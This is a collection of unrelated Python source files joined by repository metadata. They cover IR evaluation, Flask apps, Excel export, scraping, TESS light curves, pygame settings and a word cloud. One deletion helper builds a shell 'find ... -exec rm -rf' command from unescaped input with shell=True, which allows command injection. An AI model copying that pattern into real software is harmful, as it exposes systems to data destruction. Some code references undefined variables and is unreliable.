model_params = Search(index_path).gen_batch_retrieval_params(topic['path'], models_yaml, this_output_root)
for para in model_params:
this_para = (
program,
'-searchtweets' if 'mb' in collection_yaml['name'] else '',
'-topicreader', collection_yaml['topic_reader'],
'-index', index_path,
'-topics', os.path.join(collection_yaml['anserini_root'], collection_yaml['topic_root'], topic['path']),
para[0],
'-output', para[1]
)
all_params.append(this_para)
logger.info('='*10+'Starting Batch Retrieval'+'='*10)
batch_everything(all_params, atom_retrieval)
def atom_retrieval(para):
subprocess.call(' '.join(para), shell=True)
def batch_eval(collection_yaml, models_yaml, output_root):
all_params = []
index_path = get_index_path(collection_yaml)
programs = set([eval['command'] for eval in collection_yaml['evals']])
this_output_root = os.path.join(output_root, collection_yaml['name'])
if not os.path.exists(this_output_root):
os.makedirs(this_output_root)
eval_params = Evaluation(index_path).gen_batch_eval_params(this_output_root)
for para in eval_params:
topic_path, run_file_path, eval_output = para
for topic in collection_yaml['topics']:
if topic['path'] == topic_path:
this_para = (
[os.path.join(collection_yaml['anserini_root'], program) for program in programs],
os.path.join(collection_yaml['anserini_root'], collection_yaml['qrels_root'], topic['qrel']),
run_file_path,
eval_output
)
all_params.append(this_para)
logger.info('='*10+'Starting Batch Evaluation'+'='*10)
batch_everything(all_params, atom_eval)
def atom_eval(params):
Evaluation.output_all_evaluations(*params)
def batch_output_effectiveness(collection_yaml, models_yaml, output_root):
all_params = []
index_path = get_index_path(collection_yaml)
this_output_root = os.path.join(output_root, collection_yaml['name'])
if not os.path.exists(this_output_root):
os.makedirs(this_output_root)
all_params.extend( Effectiveness(index_path).gen_output_effectiveness_params(this_output_root) )
logger.info('='*10+'Starting Output Effectiveness'+'='*10)
batch_everything(all_params, atom_output_effectiveness)
def atom_output_effectiveness(para):
index_path = para[0]
output_fn = para[1]
input_fns = para[2:]
Effectiveness(index_path).output_effectiveness(output_fn, input_fns)
def print_optimal_effectiveness(collection_yaml, models_yaml, output_root, metrics=['map']):
index_path = get_index_path(collection_yaml)
this_output_root = os.path.join(output_root, collection_yaml['name'])
logger.info('='*30+'JDIQ2018 Effectiveness for '+collection_yaml['name']+'='*30)
effectiveness = Effectiveness(index_path).load_optimal_effectiveness(this_output_root, metrics)
success = True
for e in effectiveness:
expected = models_yaml[e['model']]['expected'][collection_yaml['name']][e['metric']][e['topic']]
if isclose(expected, e['actual']):
logger.info(json.dumps(e, sort_keys=True))
else:
success = False
logger.error('!'*5+'expected:%f'%expected+json.dumps(e, sort_keys=True)+'!'*5)
if success:
logger.info("All Tests Passed!")
def del_method_related_files(method_name):
folders = ['split_results', 'merged_results', 'evals', 'effectiveness']
for q in g.query:
collection_name = q['collection']
index_name = c['index']
collection_path = os.path.join(_root, index_name)
for f in folders:
if os.path.exists( os.path.join(collection_path, f) ):
logger.info('Deleting ' + os.path.join(collection_path, f) + ' *' + method_name + '*')
if f == 'split_results' or f == 'merged_results':
subprocess.call('find %s -name "*method:%s*" -exec rm -rf {} \\;' % (os.path.join(collection_path, f), method_name), shell=True)
else:
subprocess.call('find %s -name "*%s*" -exec rm -rf {} \\;' % (os.path.join(collection_path, f), method_name), shell=True)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
# general settings
parser.add_argument('--anserini_root', default='', help='Anserini path')
parser.add_argument('--collection', required=True, help='the collection key in yaml')
parser.add_argument('--n', dest='parallelism', type=int, default=16, help='number of parallel threads for retrieval/eval')
parser.add_argument('--output_root', default='all_results', help='output directory of all results')
# runtime
parser.add_argument(
"--del_method_related_files",
nargs=1,
help="Delete all the output files of a method."
)
parser.add_argument(
"--metrics",
nargs='+',
default=['map'],
help="inputs: [metrics]. For example, --metrics map ndcg20"
)
args = parser.parse_args()
if not os.path.exists(args.output_root):
os.makedirs(args.output_root)
if args.del_method_related_files:
del_method_related_files(args.del_method_related_files[0])
else:
parallelism = args.parallelism
with open(os.path.join(args.anserini_root, 'src/main/resources/regression/{}.yaml'.format(args.collection))) as f:
collection_yaml = yaml.safe_load(f)
with open(os.path.join(args.anserini_root, 'src/main/resources/jdiq2018/models.yaml')) as f:
models_yaml = yaml.safe_load(f)['models']
collection_yaml['anserini_root'] = args.anserini_root
batch_retrieval(collection_yaml, models_yaml, args.output_root)
batch_eval(collection_yaml, models_yaml, args.output_root)
batch_output_effectiveness(collection_yaml, models_yaml, args.output_root)
print_optimal_effectiveness(collection_yaml, models_yaml, args.output_root, args.metrics)
|
[
"[email protected]"
] | |
33312e48a6fec52577cc1a2ee8867f5750e74dfe
|
1f410c8010877a56f4457535197dce856676b20b
|
/src/apps/datasets/migrations/0003_dataset_uuid.py
|
a0dbd6564812f765b4f6083fab8af3ea40c986b9
|
[
"MIT"
] |
permissive
|
ckcollab/brains
|
1484222312b1695081bc77d9d5ca4ee6e8ce7ad8
|
1f85462d3e4f25170b8c487a0ff4efb598bf1f2e
|
refs/heads/master
| 2021-05-30T13:42:30.628334 | 2015-12-30T01:20:11 | 2015-12-30T01:20:11 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 463 |
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2015-12-18 20:04
from __future__ import unicode_literals
from django.db import migrations, models
import uuid
class Migration(migrations.Migration):
dependencies = [
('datasets', '0002_auto_20151217_1928'),
]
operations = [
migrations.AddField(
model_name='dataset',
name='uuid',
field=models.UUIDField(default=uuid.uuid4),
),
]
|
[
"[email protected]"
] | |
aadb205a2439041ce02330affc79dc4f38e71027
|
beffbf1f432b77499cff2e5410268cc1eabc82c3
|
/Backend/belisce.py
|
36f6c60eb1caff86a3a7a97e45ffb8b726de11f3
|
[] |
no_license
|
AlenCamagajevac/LRA
|
dc482207358ae745372d86dad371862e48cc4ed5
|
035b4fd054e9f122b4084b19c5e83daf4b1ca6df
|
refs/heads/master
| 2023-04-26T21:56:49.297027 | 2020-05-19T06:59:26 | 2020-05-19T06:59:26 | 263,342,701 | 0 | 0 | null | 2021-05-11T14:38:29 | 2020-05-12T13:20:35 |
Python
|
UTF-8
|
Python
| false | false | 1,436 |
py
|
import logging
import logging.config
import yaml
from flask import Flask
from flask_migrate import Migrate
from jwt_config import setup_jwt
from resources import blueprint as api_blueprint
from db import db
from core.seed_data.database_seed import DatabaseSeeder
from core.logging.access_log import init_access_logger
from core.metrics.prometheus import metrics
from mail import mail
log = logging.getLogger(__name__)
def create_app():
app = Flask(__name__)
# Load config
if app.config["ENV"] == "production":
app.config.from_object("config.ProductionConfig")
elif app.config["ENV"] == "testing":
app.config.from_object("config.TestingConfig")
else:
app.config.from_object("config.DevelopmentConfig")
# Initialize logs
logging.config.dictConfig(
yaml.load(
open(app.config["LOG_CONFIG_FILE"]), Loader=yaml.FullLoader)
)
init_access_logger(app)
# Register blueprints
app.register_blueprint(api_blueprint, url_prefix='/api')
# Initialize jwt
setup_jwt(app)
# Initialize database
db.init_app(app)
# Initialize migrations
Migrate(app, db)
# Seed database data
seeder = DatabaseSeeder()
seeder.init_app(app)
# Initialize metrics
try:
metrics.init_app(app)
except ValueError:
log.info('Metrics already initialized')
# Initialize mail
mail.init_app(app)
return app
|
[
"[email protected]"
] | |
b96e02dead305da09846744075aa26794afff58c
|
8b75c16b18adaeccd58d0f933e64d6521d90697e
|
/matplotlib_stu/lesson_02.py
|
28c00e940c457855dccd58ad3bac1aced8c20dff
|
[] |
no_license
|
elliottqian/ML_STUDY_P27_GIT
|
21a16bee9d6b9747e5743dc25cd174e046b6f0ce
|
38e2afab079ccc6acfe93adffbbebc2930d169a7
|
refs/heads/master
| 2021-01-20T21:12:48.794327 | 2017-01-08T16:24:12 | 2017-01-08T16:24:12 | 62,136,714 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 722 |
py
|
import numpy as np
import matplotlib.pyplot as plt
n_groups = 5
means_men = (20, 19, 18, 17, 16)
means_women = (25, 32, 34, 20, 25)
fig, ax = plt.subplots()
index = np.arange(n_groups)
# 宽度
bar_width = 0.1
opacity = 0.4
# 参数分别是:
# 坐标, 坐标对应的数组, 宽度, 透明度, 颜色, 标题
rects1 = plt.bar(index, means_men, bar_width, alpha=opacity, color='b', label='Men')
rects2 = plt.bar(index + bar_width, means_women, bar_width, alpha=opacity, color='r', label='Women')
plt.xlabel('Group')
plt.ylabel('Scores')
plt.title('Scores by group and gender')
# x轴标题位置
plt.xticks(index + bar_width, ('A', 'B', 'C', 'D', 'E'))
plt.ylim(0, 40)
plt.legend()
plt.tight_layout()
plt.show()
|
[
"[email protected]"
] | |
84bfdcb2572f73b8a3127ae075b64188d0f455ad
|
2dd2c41e65cbb8d915d01c40ed1c68c4e923e98b
|
/venv/Lib/site-packages/tablip/formats/_xls.py
|
b631f3994a0dd768a96fb5cfd090acfb9f6f36a3
|
[] |
no_license
|
tyagisen/Ecommerce
|
aca312c0116175058de35453d30dcc8cb2496bce
|
bc6a1cc07f5416a46fa0c3a03b6b91bf1b8508f8
|
refs/heads/master
| 2023-08-15T22:45:33.339529 | 2021-09-23T13:56:31 | 2021-09-23T13:56:31 | 409,611,051 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,937 |
py
|
""" Tablib - XLS Support.
"""
from io import BytesIO
import tablip
import xlrd
import xlwt
# special styles
wrap = xlwt.easyxf("alignment: wrap on")
bold = xlwt.easyxf("font: bold on")
class XLSFormat:
title = 'xls'
extensions = ('xls',)
@classmethod
def detect(cls, stream):
"""Returns True if given stream is a readable excel file."""
try:
xlrd.open_workbook(file_contents=stream)
return True
except Exception:
pass
try:
xlrd.open_workbook(file_contents=stream.read())
return True
except Exception:
pass
try:
xlrd.open_workbook(filename=stream)
return True
except Exception:
return False
@classmethod
def export_set(cls, dataset):
"""Returns XLS representation of Dataset."""
wb = xlwt.Workbook(encoding='utf8') # 用xlwt建立工作簿-一个文件
ws = wb.add_sheet(dataset.title if dataset.title else 'Tablib Dataset') # 对工作簿对象加一张表,表头名字为这个dataset的头
cls.dset_sheet(dataset, ws) # 往表中加dataset数据
stream = BytesIO()
wb.save(stream)
return stream.getvalue()
@classmethod
def export_book(cls, databook):
"""Returns XLS representation of DataBook."""
wb = xlwt.Workbook(encoding='utf8')
for i, dset in enumerate(databook._datasets):
ws = wb.add_sheet(dset.title if dset.title else 'Sheet%s' % (i))
cls.dset_sheet(dset, ws)
stream = BytesIO()
wb.save(stream)
return stream.getvalue()
@classmethod
def import_set(cls, dset, in_stream, headers=True):
"""Returns databook from XLS stream."""
dset.wipe()
xls_book = xlrd.open_workbook(file_contents=in_stream.read())
sheet = xls_book.sheet_by_index(0)
dset.title = sheet.name
for i in range(sheet.nrows):
if i == 0 and headers:
dset.headers = sheet.row_values(0)
else:
dset.append([
val if typ != xlrd.XL_CELL_ERROR else xlrd.error_text_from_code[val]
for val, typ in zip(sheet.row_values(i), sheet.row_types(i))
])
@classmethod
def import_book(cls, dbook, in_stream, headers=True):
"""Returns databook from XLS stream."""
dbook.wipe()
xls_book = xlrd.open_workbook(file_contents=in_stream)
for sheet in xls_book.sheets():
data = tablip.Dataset()
data.title = sheet.name
for i in range(sheet.nrows):
if i == 0 and headers:
data.headers = sheet.row_values(0)
else:
data.append(sheet.row_values(i))
dbook.add_sheet(data)
@classmethod
def get_col_width(cls,data):
row_length = 100 if len(data)>100 else len(data)
col_length = 20 if len(data[0])>20 else len(data[0])
col_width = {}
for n in range(col_length):
a = 0
for m in range(row_length):
content = data[m][n]
if content != None and content!='' and len(str(content))>a: #第m行的第n列的字数 如果比a大,则保存a为最大数
a = len(str(content))
col_width[n] = a
return col_width
@classmethod
def dset_sheet(cls, dataset, ws):
"""Completes given worksheet from given Dataset."""
_package = dataset._package(dicts=False) # 转化全部数据表数据为一个list,每个项为每一行。
col_width = cls.get_col_width(_package)
for i, sep in enumerate(dataset._separators):
_offset = i
_package.insert((sep[0] + _offset), (sep[1],))
for i, row in enumerate(_package):
for j, col in enumerate(row):
# bold headers 如果第一行,且dataset是有表头的。则写表头
if (i == 0) and dataset.headers:
ws.col(j).width = (col_width[j]+3) * 256 # 设置某列宽度为256*字数,由于还是会短一点点,所以再加3个字符使显示全
ws.write(i, j, col, bold) # 第几行|第几列|内容|style
# frozen header row
ws.panes_frozen = True
ws.horz_split_pos = 1
# bold separators
elif len(row) < dataset.width:
ws.write(i, j, col, bold)
# wrap the rest
else:
try:
if '\n' in col:
ws.write(i, j, col, wrap)
else:
ws.write(i, j, col)
except TypeError:
ws.write(i, j, col)
|
[
"[email protected]"
] | |
f1e8216fde2ab8e09e1501fb7af1c8b7efa1794f
|
fe25c062e41678a45a9560a372172d089c3acccd
|
/_lab-work/lab13/task5/main.py
|
a0823363f6f819223297947ebc5b1c4d8dee4cd0
|
[] |
no_license
|
linuk/food-serve-delicious
|
bd200ad33fc2b65177535dd71499ec011d01e275
|
95245d5a6f5922ff976d6bfedce0ceffb96fc4f5
|
refs/heads/master
| 2020-03-15T14:47:59.326180 | 2018-05-04T23:31:00 | 2018-05-04T23:31:00 | 132,197,477 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,990 |
py
|
from flask import Flask, render_template, flash, send_from_directory
import os
from werkzeug.utils import secure_filename
from flask_wtf import FlaskForm
from flask_wtf.file import FileField, FileAllowed, FileRequired
app = Flask(__name__)
app.config['UPLOAD_FOLDER'] = 'static/uploads'
app.secret_key = "asdhiqwekhukh2397y1238oyt786atp0-vy9awer"
ALLOW_EXTENSIONS = ['png', 'jpg', 'jpeg', 'gif']
class UploadForm(FlaskForm):
""" Construct the upload form """
upload = FileField("image", validators=[FileAllowed(ALLOW_EXTENSIONS,
'Please upload image files: the extension should be "{}".'
.format(ALLOW_EXTENSIONS)), FileRequired()])
# list uploaded files and upload form
@app.route('/', methods=['GET', 'POST'])
def main():
error = None
form =UploadForm()
if form.validate_on_submit():
# get a secure file name, such as removing the space and adding underscore
file = form.upload.data
filename = secure_filename(file.filename)
# save the file to the upload folder
file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))
flash('Image "{}" is uploaded.'.format(file.filename))
# retrieve the files and validate the file extension at the same time
files = [os.path.join(app.config['UPLOAD_FOLDER'], f) for f in os.listdir(app.config['UPLOAD_FOLDER']) if
validate_filename(f)]
return render_template('main.html', form=form, files=files, error=error)
# download file
@app.route('/download/<filename>')
def download(filename):
return send_from_directory(app.config['UPLOAD_FOLDER'], filename)
# Private methods
def validate_filename(filename):
validateDot = '.' in filename
validateExt = filename.split('.')[1].lower() in ALLOW_EXTENSIONS
return validateDot and validateExt
if __name__ == '__main__':
app.run(host='0.0.0.0', port=4000, debug=True)
|
[
"[email protected]"
] | |
9fd8a6e45d473d3e878fe000db8eb996be0c59a3
|
635c79ae11f9ac29aa1917a3792b8195c6689ec3
|
/1_Python/Desafios/036_Empréstimo_casa.py
|
3232e4198848bde2cb5c02452b63912258f11e67
|
[
"MIT"
] |
permissive
|
guilhermebaos/Curso-em-Video-Python
|
822d3a43235f75637f5698aa5d071e7bf96262ec
|
b72c98aac74824813e96932def07b9449b74dd14
|
refs/heads/master
| 2022-02-26T00:35:58.548167 | 2022-02-05T13:17:04 | 2022-02-05T13:17:04 | 254,331,576 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 579 |
py
|
from termcolor import colored, cprint
cprint('Sistema de aprovamento de empréstinmos automático', 'yellow')
c = float(input(colored('Qual é o valor da casa que quer comprar?(€) ', 'blue')))
s = float(input(colored('Qual é o seu salário?(€) ', 'blue')))
a = float(input(colored('Em quantos anos pretende pagar a casa? ', 'blue')))
m = a * 12
men = c / m
sd = s * 0.3
if sd > men:
cprint('O seu empréstimo foi aprovado!', 'green')
cprint('A sua prestação mensal será de {:.2f}€'.format(men), 'green')
else:
cprint('O seu empréstimo foi negado.', 'red')
|
[
"[email protected]"
] | |
c76818ac251baba4d8e9c25bf8d51d65511fec87
|
3df392ab9726687b71ba721f5ccb7e87e68152f5
|
/src/python/cloud_functions/clear_shelves.py
|
bc764e1f15f3e819b6643b61898511f5c99e178e
|
[] |
no_license
|
djmarcus/OrderingDelivery
|
f68573420c0844dba6eec846f3cfe6fccba00716
|
5050e35f19ba334d7e350d08a80a926b535232f3
|
refs/heads/master
| 2022-04-26T11:13:51.906701 | 2020-04-09T18:52:51 | 2020-04-09T18:52:51 | 197,234,216 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 689 |
py
|
from google.cloud import datastore
datastore_client = datastore.Client()
def clear_shelves():
query = datastore_client.query(kind="overflow")
results = list(query.fetch())
for result in results:
datastore_client.delete(result.key)
query = datastore_client.query(kind="cold")
results = list(query.fetch())
for result in results:
datastore_client.delete(result.key)
query = datastore_client.query(kind="frozen")
results = list(query.fetch())
for result in results:
datastore_client.delete(result.key)
query = datastore_client.query(kind="hot")
results = list(query.fetch())
for result in results:
datastore_client.delete(result.key)
clear_shelves()
|
[
"[email protected]"
] | |
36457a95f13f7e83e99c40acfe8b170b4504153e
|
6528707b55bcf417bab35fba59c956a704c524ad
|
/examples/threaded.py
|
98edb80fdfd6c339c2e6eaf4f27e3b910ba25655
|
[] |
no_license
|
badisa/bs-abqpy-example
|
e0231bb55c0254e3d630ba7cb1dcce993d93c89b
|
bc955baf93bf422c8ae4a4662c051fb537dfaf7a
|
refs/heads/master
| 2016-08-03T23:48:11.318895 | 2015-06-03T01:16:43 | 2015-06-03T01:16:43 | 35,226,206 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,784 |
py
|
import threading
import urllib
import time
from bs4 import BeautifulSoup
import argparse
parser = argparse.ArgumentParser()
parser.add_argument(
'number',
type=int,
help='Number of Poems to Scrape')
parser.add_argument(
'count',
type=int,
help='Number of Loops in Each Thread',
default=0)
args = parser.parse_args()
poemSem = threading.Semaphore()
poemSem.poems = []
class GetTopPoem(threading.Thread):
'''
Threaded Variant of Poem Web Scraping
'''
def __init__(self, start, incr, count):
'''Initialize the Thread'''
threading.Thread.__init__(self)
self.INITIAL = start
self.INCREMENT = incr
self.COUNT = count
def run(self):
global poemSem
base_url = 'http://hellopoetry.com'
page = urllib.urlopen(base_url).read()
soup = BeautifulSoup(page)
poems = soup.find_all('div', class_='poem')
for x in xrange(self.INITIAL, (self.INCREMENT * self.COUNT), self.INCREMENT):
poem_page = poems[x].get('data-url')
poem_page = urllib.urlopen(poem_page).read()
poetry_soup = BeautifulSoup(poem_page)
poem = poetry_soup.find('div', class_='poem')
for br in poem.find_all('br'):
br.append('\n')
br.unwrap()
title = poem.get('data-text')
body = poem.p.extract().prettify()
poemSem.poems.append([title, body])
def main(num, count):
num = num / count
thread_list = []
for i in xrange(num):
thread = GetTopPoem(i, num, count)
thread.start()
thread_list.append(thread)
for thread in thread_list:
thread.join()
print poemSem.poems, len(poemSem.poems)
main(args.number, args.count)
|
[
"[email protected]"
] | |
11f394999f596ffed484585977fc5206096d8378
|
33b00fadfa2e56e5a628e1905411088fa7ecac8d
|
/pipeline.py
|
502c2762e25f273b5c4d02600df766cba02b452a
|
[] |
no_license
|
burke86/tequila_shots_binder
|
82c43accc48e6ea34022de481248f0eb8b6dfb23
|
30b480b013f5c920e269183ffc3e1cfe69980889
|
refs/heads/master
| 2022-11-06T14:07:00.220271 | 2020-06-25T10:47:43 | 2020-06-25T10:47:43 | 274,830,222 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,961 |
py
|
import numpy as np
import sys, os
import warnings
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
import lightkurve as lk
from lightkurve import MPLSTYLE
from astropy import units as u
from astropy.table import unique
from astropy.table import QTable
from astropy.coordinates import SkyCoord
from astropy.wcs.utils import pixel_to_skycoord
import astropy.io.fits as fits
plt.style.use(MPLSTYLE)
def load(coord, diffim=False,
out_dir=os.path.join(os.path.expanduser('~'),'tequila_shots/output')):
"""
Load tequila_shots output file for previous pipeline run.
WARNING: This code is not fully validated!
Args:
coord (SkyCoord): Astropy SkyCoord of target
(REQUIRED)
diffim (bool): Load difference imaging?
(default is False)
out_dir (str): Work directory path
(default is '~/tequila_shots/output')
Returns:
out_dict: Output dictionary
Use `out_dict.keys()` to get keywords.
"""
# Get coordinate name
coord_name = 'J{0}{1}'.format(coord.ra.to_string(unit=u.hourangle, sep='', precision=2, pad=True),
coord.dec.to_string(sep='', precision=2, alwayssign=True, pad=True))
# Get the directory of the target
coord_dir = os.path.join(out_dir, coord_name)
if not os.path.exists(coord_dir):
print('Coord directory does not exist!')
return None
print('Files in object directory %s:' % coord_dir)
f_list = os.listdir(coord_dir)
if len(f_list) == 0:
print('Coord directory is empty!')
return None
[print(f) for f in f_list]
#TODO/WARNING: sort by sector!!
print('WARNING: Sectors may be jumbled!!')
f_list = [os.path.join(coord_dir,f) for f in f_list]
# Plot image and get TPFs
out_dict = {}
out_dict['lc_target'] = [] # Target light curve array of all sectors
out_dict['lc_target_bkg'] = [] # background light curve array
out_dict['lc_star'] = [] # Star light curve array of all sectors
out_dict['aper_target_list'] = [] # List of target apertures files for each sector
out_dict['aper_star_list'] = [] # List of star apertures files for each sector
out_dict['ref_flux_list'] = [] # List of target pixel files for each sector
out_dict['tpf_list'] = [] # List of target pixel files for each sector
out_dict['tpf_diff_list'] = [] # List of difference target pixel files for each sector
out_dict['coord_dir'] = coord_dir # Target output directory
out_dict['wcs_ref'] = [] # Reference WCS
# Populate dict
for f in f_list:
if '_panel_' in f:
img = mpimg.imread(f)
imgplot = plt.imshow(img)
plt.gca().axis('off')
plt.tight_layout()
plt.show()
elif 'ref_flux_' in f:
out_dict['ref_flux_list'].append(fits.open(f)[0].data)
elif 'lc_target_bkg_' in f:
out_dict['lc_target_bkg'].append(lk.lightcurvefile.LightCurveFile(f))
elif 'lc_target_' in f:
out_dict['lc_target'].append(lk.lightcurvefile.LightCurveFile(f))
elif 'lc_star_' in f:
out_dict['lc_star'].append(lk.lightcurvefile.LightCurveFile(f))
# Load TPFs
if diffim:
if 'tpf_diff_' in f:
tpf = lk.TessTargetPixelFile(f)
out_dict['tpf_list'].append(tpf)
if out_dict['wcs_ref'] == []:
out_dict['wcs_ref'] = tpf.wcs
elif 'tpfdiff_' in f:
tpf = lk.TessTargetPixelFile(f)
out_dict['tpf_diff_list'].append(tpf)
else:
if 'tpf_' in f:
tpf = lk.TessTargetPixelFile(f)
out_dict['tpf_list'].append(tpf)
if out_dict['wcs_ref'] == []:
out_dict['wcs_ref'] = tpf.wcs
print('Done loading.')
return out_dict
|
[
"[email protected]"
] | |
e642eca3839f51f6a0934e2a47c2bbfce1e4c387
|
1c774c129385b4bd6006ef61f53e75d07474d03e
|
/base_for_web_app.py
|
000df6aa26904997f99cac20037aa0971f39c861
|
[] |
no_license
|
darth-mycol/slot-wiz
|
4de6388c5c754ccdd1159f8623543d12c9b38d08
|
d21f214c7366c41d4a580bfb6d395c2876469ac9
|
refs/heads/master
| 2021-01-13T17:32:07.158550 | 2017-02-23T17:59:37 | 2017-02-23T17:59:37 | 81,810,073 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,522 |
py
|
from flask import Flask, jsonify, render_template, request
import data_interaction_module_aiims
import data_interaction_module_slotting
import slot_distribution_calculator
import slot_schedule_payoff_calculator
app = Flask(__name__)
@app.route('/_by_date')
def by_date_look_up():
try:
date = request.args.get('date', 0, type=str)
capacity = request.args.get('capacity', 0, type=int)
department = request.args.get('department', 0, type=int)
optimal_n, prob_range = data_interaction_module_aiims.retrieve_values_by_date(date, department, capacity)
if optimal_n is None:
return jsonify(success="false", result="Data Not Previously Calculated",
prob_range="Data Not Previously Calculated")
return jsonify(success="true", result=optimal_n, prob_range=round(float(prob_range), 2))
except Exception:
return jsonify(success="false", result="Internal Error - Please check parameters",
prob_range="Internal Error - Please check parameters")
@app.route('/_add_numbers')
def add_numbers():
try:
prob = request.args.get('probability', 0, type=float)
capacity = request.args.get('capacity', 0, type=int)
optimal_n, prob_range = data_interaction_module_aiims.retrieve_values(prob, capacity)
if optimal_n is None:
return jsonify(success="false",
result="Data Not Previously Calculated. Calculated probability range - 0.1 to 0.99, both inclusive, with a step of 0.01",
prob_range="Data Not Previously Calculated")
return jsonify(success="true", result=optimal_n, prob_range=round(float(prob_range), 2))
except Exception:
return jsonify(success="false", result="Internal Error. Please check parameters.",
prob_range="Internal Error. Please check parameters.")
@app.route('/_add_date_data')
def by_date():
try:
date = request.args.get('date', 0, type=str)
department = request.args.get("department", 0, type=str)
booked = request.args.get("daybooked", 0, type=str)
show_up = request.args.get("dayshowup", 0, type=str)
data_interaction_module_aiims.save_values_by_date(date, department, booked, show_up)
return jsonify(success="true")
except Exception:
return jsonify(success="false")
@app.route('/_lookup_optimal_slotting_schedule')
def lookup_optimal_slotting_schedule():
try:
prob = request.args.get('probability', 0, type=float)
total_capacity = request.args.get('total_capacity', 0, type=int)
over_time_constant = request.args.get('over_time_constant', 1, type=float)
wait_time_constant = request.args.get('wait_time_constant', 1, type=float)
over_time_power = request.args.get('over_time_power', 2, type=float)
schedule, pay_off = data_interaction_module_slotting.look_up_dictionary(prob, 3, total_capacity,
over_time_constant, wait_time_constant,
over_time_power)
if schedule is None or len(schedule) == 0:
return jsonify(success="false", result="Optimal Value not previously calculated",
prob_range="Optimal Value not previously calculated")
return jsonify(success="true", result=', '.join(map(str, schedule)), prob_range=round(float(pay_off), 2))
except Exception:
return jsonify(success="false", result="Internal Error. Please check parameters.",
prob_range="Internal Error. Please check parameters.")
@app.route('/_calculate_payoff')
def calculate_payoff():
try:
number_of_slots = request.args.get('number_of_slots', 3, type=int)
input_schedule = request.args.get('schedule', 2, type=str)
schedule = []
for term in input_schedule.split(","):
if term.strip() == "":
continue
schedule.append(int(term.strip()))
if len(schedule) != number_of_slots:
return jsonify(success="false", result="No of Slots in Schedule not equal to total number of slots.")
if number_of_slots < 1:
return jsonify(success="false", result="No of Slots cannot be less than 1")
prob = request.args.get('probability', 0, type=float)
total_capacity = request.args.get('total_capacity', 0, type=int)
over_time_constant = request.args.get('over_time_constant', 1, type=float)
wait_time_constant = request.args.get('wait_time_constant', 1, type=float)
over_time_power = request.args.get('over_time_power', 2, type=float)
per_slot_processing_list = \
slot_distribution_calculator.get_initial_configuration(number_of_slots, total_capacity)
pay_off = slot_schedule_payoff_calculator.estimate_payoff(schedule, prob, per_slot_processing_list,
over_time_constant, wait_time_constant,
over_time_power)
return jsonify(success="true", result=round(float(pay_off), 2))
except Exception:
return jsonify(success="false", result="Internal Error. Please check parameters.")
@app.route('/')
def index():
return render_template('index.html')
if __name__ == '__main__':
app.run()
|
[
"[email protected]"
] | |
07bafbf54361a1f49f8246f063abe7ea2f4ac270
|
386448448c23d0e4f6b72d37f7ca20caa1ecc207
|
/part 09 增加子弹/settings.py
|
93d23f33f61f96182c92c5aae5d24b66cb55ca40
|
[] |
no_license
|
typeme/pygame-demo
|
1299bd1b437f52234cf1c48a4ee3265811bbf4a5
|
875fabec70ae7aaa245f7fc1c35f2dee173df58e
|
refs/heads/master
| 2020-05-28T09:38:54.475818 | 2019-07-01T15:00:33 | 2019-07-01T15:00:33 | 188,958,624 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,014 |
py
|
import pygame as pg
vec = pg.math.Vector2
# 定义了一些颜色 (R, G, B)
WHITE = (255, 255, 255)
BLACK = (0, 0, 0)
DARKGREY = (40, 40, 40)
LIGHTGREY = (100, 100, 100)
GREEN = (0, 255, 0)
RED = (255, 0, 0)
YELLOW = (255, 255, 0)
BROWN = (106, 55, 5)
# 游戏基本设定
WIDTH = 1024 # 16 * 64 or 32 * 32 or 64 * 16
HEIGHT = 768 # 16 * 48 or 32 * 24 or 64 * 12
FPS = 60 # 刷新率
TITLE = "part 09 Demo"
BGCOLOR = BROWN # 背景颜色
TILESIZE = 64 # 方格的尺寸
GRIDWIDTH = WIDTH / TILESIZE # 每行方格的数量
GRIDHEIGHT = HEIGHT / TILESIZE # 每列方格的数量
WALL_IMG = 'tileGreen_39.png'
# Player settings
PLAYER_SPEED = 300.0
PLAYER_ROT_SPEED = 250.0
PLAYER_IMG = 'manBlue_gun.png'
PLAYER_HIT_RECT = pg.Rect(0, 0, 35, 35)
BARREL_OFFSET = vec(30, 10)
# Gun settings
BULLET_IMG = 'bullet.png'
BULLET_SPEED = 500
BULLET_LIFETIME = 1000
BULLET_RATE = 150
KICKBACK = 200
GUN_SPREAD = 5
# Mob settings
MOB_IMG = 'zombie1_hold.png'
MOB_SPEED = 150
MOB_HIT_RECT = pg.Rect(0, 0, 35, 35)
|
[
"[email protected]"
] | |
339e645241a59e0357edfc8df83ee28aea3818c3
|
2e811dbe3b5e08733416d2aae1d63e32d0d8b079
|
/word_cloud.py
|
10be404d6a780e949df5bcd1b039218fe5762136
|
[] |
no_license
|
tengbing88/The_Captain
|
1f40b23ac04bcb3fbca6041cc70b8e8449004623
|
72f8b76d89dc60d961afbb4e6b5f27b3d36dee3c
|
refs/heads/master
| 2022-03-09T06:26:26.975792 | 2019-11-01T17:00:17 | 2019-11-01T17:00:17 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,109 |
py
|
# -*- coding: utf-8 -*-
# @Author : Keginx
from collections import Counter
from wordcloud import WordCloud, ImageColorGenerator
import jieba
import matplotlib.image as mpimg
import matplotlib.pyplot as plt
import pandas as pd
def generate_wordcloud(stopwords):
## 绘制词云
comment_data = pd.read_csv('resources/drop_duplicates_data.csv', encoding="GBK", dtype={'score': float})
grouped = comment_data.groupby(['city'])
grouped_pct = grouped['score']
comments_str = ' '.join(comment_data['comment'])
words_list = []
word_generator = jieba.cut_for_search(comments_str)
for word in word_generator:
words_list.append(word)
words_list = [k for k in words_list if len(k) > 1]
back_color = mpimg.imread('resources/image.jpg') # 解析该图片
wc = WordCloud(background_color='white', # 背景颜色
